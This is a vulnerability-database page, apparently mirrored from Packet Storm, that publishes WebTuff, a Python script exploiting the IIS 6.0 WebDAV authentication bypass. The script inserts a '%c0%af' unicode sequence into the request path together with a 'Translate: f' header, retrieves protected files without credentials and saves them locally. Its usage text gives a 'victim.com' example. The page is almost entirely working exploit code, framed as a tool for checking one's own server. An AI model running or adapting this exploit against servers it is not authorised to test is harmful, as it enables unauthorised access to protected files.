Lucene search
+L

WebTuff IIS 6.0 WebDAV Authentication Bypass

🗓️ 27 May 2009 00:00:00Reported by Raviv RazType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 29 Views

WebTuff v1.0 tests IIS 6.0 WebDAV for authentication bypass. Retrieves resource without authentication, saves locally

Code
`"""  
WebTuff v1.0  
Copyright 2009, Raviv Raz - [email protected]  
WebTuff is distributed under the terms of the GNU General Public License  
WebTuff is free software: you can redistribute it and/or modify  
it under the terms of the GNU General Public License as published by  
the Free Software Foundation, either version 3 of the License, or  
(at your option) any later version.  
  
This program is distributed in the hope that it will be useful,  
but WITHOUT ANY WARRANTY; without even the implied warranty of  
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the  
GNU General Public License for more details.  
  
You should have received a copy of the GNU General Public License  
along with this program. If not, see <http://www.gnu.org/licenses/>.  
  
"""  
from sys import argv  
from urlparse import urlparse  
from cStringIO import StringIO  
import httplib  
headers = {"Translate":"f","Connection":"close"}  
def usage():  
print ""  
print "Copyright 2009, Raviv Raz - [email protected]"  
print "WebTuff is a testing utility that verifies"  
print "whether your IIS server is vulnerable to"  
print "Microsoft IIS 6.0\nWebDAV Remote Authentication Bypass"  
print "In a successful breach, WebTuff saves the"  
print "remote resource locally under the same name"  
print "\nUsage: %s <url to web directory>\nFor example: %s http://www.victim.com/path/to/file.txt"%(argv[0],argv[0])  
raw_input()  
raise SystemExit  
  
def obfuscate(url):  
path = urlparse(url)[2]  
obfuscated = path[0:len(path)/2]+"%c0%af"+path[len(path)/2:]  
newUrl = url.replace(path,obfuscated)  
return newUrl  
  
def main():  
try:  
originalUrl = str(argv[1])  
hostname = urlparse(originalUrl)[1]  
filename = originalUrl[originalUrl.rfind("/")+1:]  
except:  
usage()  
obUrl = obfuscate(originalUrl)  
print "[!] Attempting to connect to: %s"%originalUrl  
try:  
conn = httplib.HTTPConnection(hostname)  
conn.request( "GET", urlparse(originalUrl)[2],None,headers )  
response = conn.getresponse()  
if response.status == 404:  
print "[x] Resource was not found on the server."  
elif response.status == 401:  
print "[x] Request denied by IIS authentication. Good."  
elif response.status == 200:  
print "[v] Resource was retrieved without any authentication! You must apply ACL to web folders."  
print "[!] Proceeding with URL obfuscation:",obUrl  
conn = httplib.HTTPConnection(hostname)  
conn.request( "GET", urlparse(obUrl)[2],None,headers )  
response = conn.getresponse()  
if response.status == 404:  
print "[x] Resource was not found on the server."  
elif response.status == 401:  
print "[x] Request still denied by IIS authentication. You are protected against this attack."  
elif response.status == 200:  
print "[v] URL Obfuscation attack succeeded! You must apply security to IIS immediately."  
print "[v] The contents of this resource have been saved into: %s\n"%filename  
data = StringIO(response.read())  
output = open(filename,"wb")  
output.write(data.read())  
output.close()  
except:  
print "[x] Connection failed. Breaking connection"  
conn.close()  
raise SystemExit  
  
if __name__ == "__main__":  
main()  
  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

27 May 2009 00:00Current
0.7Low risk
Vulners AI Score0.7
29